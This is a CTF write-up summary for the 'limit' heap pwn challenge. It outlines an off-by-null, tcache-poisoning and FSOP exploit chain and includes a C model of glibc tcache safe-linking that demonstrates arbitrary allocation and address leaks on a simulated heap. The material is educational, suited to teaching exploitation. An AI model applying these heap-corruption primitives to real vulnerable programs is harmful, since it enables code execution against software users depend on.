Tags: pwn heap
Rating:
### Exploit summary
Exploit the off-by-null bug to create overlapping chunks, then use tcache poisoning in an unusual way to get around the heap-boundary restriction: instead of trying to allocate chunks beyond the boundary, allocate a chunk on top of the tcache entries array itself (tcache_perthread_struct, which sits at the start of the heap). With that chunk, redirect further allocations to arbitrary addresses and read back the next pointer that malloc writes into the tcache entry, leaking stack and binary addresses. Finally, overwrite a chunk pointer in the global chunks array so it points at stdout and finish with a file-struct (FSOP) exploit to get a shell.
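To make the tcache step concrete, here is a small C model of the glibc (2.32 and later, safe-linking) tcache data structures, added to this page as an illustration; it is not the challenge binary, its exploit, or code from the linked writeup. The simulated `heap` buffer, the `within_heap` bounds check standing in for the challenge's restriction, the bin indices and the victim chunk offset are all assumptions chosen for the model. It shows why landing an allocation on `tcache_perthread_struct` is so useful: `entries[]` holds raw, unmangled bin heads, so writing it redirects the next `malloc` without having to defeat safe-linking again, and because `tcache_get` reloads the head from the first qword at the returned address, allocating on top of a stack or data location leaves a mangled copy of that qword in the struct, which the attacker reads back and demangles with the (known) target address.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout of glibc >= 2.32 tcache structures (real layout, simulated heap). */
#define TCACHE_MAX_BINS 64

typedef struct tcache_entry {
    struct tcache_entry *next;  /* safe-linked (mangled) while the chunk is free */
    uintptr_t key;              /* double-free detection tag */
} tcache_entry;

typedef struct {
    uint16_t counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];  /* bin heads: raw pointers, NOT mangled */
} tcache_perthread_struct;

/* glibc safe-linking: the key is the address of the pointer slot itself >> 12 */
#define PROTECT_PTR(pos, ptr) \
    ((tcache_entry *)(((uintptr_t)(pos) >> 12) ^ (uintptr_t)(ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR(&(ptr), ptr)

/* Assumed simulated heap. The tcache struct is the first chunk (0x290 on x86-64),
   so its user pointer is heap + 0x10; our victim chunk follows it at heap + 0x2a0. */
#define HEAP_SIZE 0x4000
static uint8_t heap[HEAP_SIZE] __attribute__((aligned(0x1000)));
#define TCACHE ((tcache_perthread_struct *)(heap + 0x10))

void *tcache_struct_addr(void) { return TCACHE; }
tcache_entry *victim_chunk(void) { return (tcache_entry *)(heap + 0x2a0); }

/* Assumed stand-in for the challenge's "allocation must stay inside the heap" rule. */
int within_heap(const void *p) {
    const uint8_t *q = (const uint8_t *)p;
    return q >= heap && q < heap + HEAP_SIZE;
}

/* Model of glibc tcache_get(): pop the head, then reload the head from the first
   qword at the returned address, demangled with that address >> 12. Side effects
   to keep in mind: it zeroes the qword at returned+8 (key), and real glibc also
   rejects a head that is not 16-byte aligned. */
tcache_entry *model_tcache_get(tcache_perthread_struct *tc, size_t idx) {
    tcache_entry *e = tc->entries[idx];
    tc->entries[idx] = REVEAL_PTR(e->next);
    --tc->counts[idx];
    e->key = 0;
    return e;
}

/* Classic tcache poisoning through the overlapping chunk: forge a correctly
   mangled next pointer in the freed victim so the bin continues at `target`. */
void poison_next(tcache_entry *victim, void *target) {
    victim->next = PROTECT_PTR(victim, target);
}

/* Step 1: point the poisoned bin at the tcache struct. The second malloc of this
   size returns heap + 0x10, which passes any "inside the heap" check. */
void *alloc_on_tcache_struct(size_t idx, tcache_entry *victim) {
    memset(TCACHE, 0, sizeof *TCACHE);
    TCACHE->entries[idx] = victim;
    TCACHE->counts[idx] = 2;                 /* as after freeing two chunks of this size */
    poison_next(victim, TCACHE);             /* the write the overlap gives us */
    (void)model_tcache_get(TCACHE, idx);     /* first malloc: returns victim */
    return model_tcache_get(TCACHE, idx);    /* second malloc: returns the tcache struct */
}

/* Step 2: with a chunk over the struct, redirect an allocation anywhere by writing
   the raw head and a non-zero count; no mangling needed. */
void *arbitrary_alloc(size_t idx, void *target) {
    TCACHE->entries[idx] = (tcache_entry *)target;
    TCACHE->counts[idx] = 1;
    return model_tcache_get(TCACHE, idx);
}

/* Step 3: leak. After the allocation, entries[idx] holds the first qword at
   `target` XORed with target >> 12; read it back through our chunk and undo the XOR. */
uintptr_t leak_qword_via_tcache(size_t idx, void *target) {
    (void)arbitrary_alloc(idx, target);
    uintptr_t head = (uintptr_t)TCACHE->entries[idx];
    return head ^ ((uintptr_t)target >> 12);
}

/* Constructed stand-in for a stack frame holding a saved return address. */
static uintptr_t fake_stack[4] __attribute__((aligned(16)));
uintptr_t *plant_fake_stack(uintptr_t saved_ret) {
    fake_stack[0] = saved_ret;
    fake_stack[1] = 0xdeadbeefULL;  /* gets zeroed by the key write */
    return fake_stack;
}

int main(void) {
    void *p = alloc_on_tcache_struct(2, victim_chunk());
    printf("second malloc -> %p, tcache struct at %p, in heap: %d\n",
           p, tcache_struct_addr(), within_heap(p));
    uintptr_t *fs = plant_fake_stack(0x401234);
    printf("leaked qword from fake stack: 0x%lx\n",
           (unsigned long)leak_qword_via_tcache(3, fs));
    return 0;
}
```

Build with `gcc -O0 model.c -o model` and run; the two printed lines show the second allocation landing on the tcache struct and the planted value coming back out of `entries[]`. The same `arbitrary_alloc` primitive is what the final step of the summary relies on: point a bin head at the slot in the global chunks array and the next allocation is a write into that slot.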
Full writeup link:
[https://razvan.sh/writeups/limit-smileyctf/](https://razvan.sh/writeups/limit-smileyctf/)